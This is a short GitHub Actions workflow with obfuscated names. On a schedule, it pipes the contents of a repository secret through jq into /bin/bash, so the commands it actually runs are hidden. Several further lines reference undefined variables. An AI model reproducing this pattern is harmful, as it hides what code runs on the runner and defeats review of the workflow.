name: lingshiwwx
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingshiwwx
        env:
          w89612: ${{ secrets.w89612 }}
        run: |
          echo $w89612 | jq -r .y4 | /bin/bash
          echo $kw9 | jq -r .oj561 | /bin/bash
          echo $nadi39 | jq -r .ocbr95453 | /bin/bash
          echo $ty45 | jq -r .dv26 | /bin/bash
          echo $vb34221 | jq -r .b02 | /bin/bash
          echo $mw91823 | jq -r .mf64 | /bin/bash

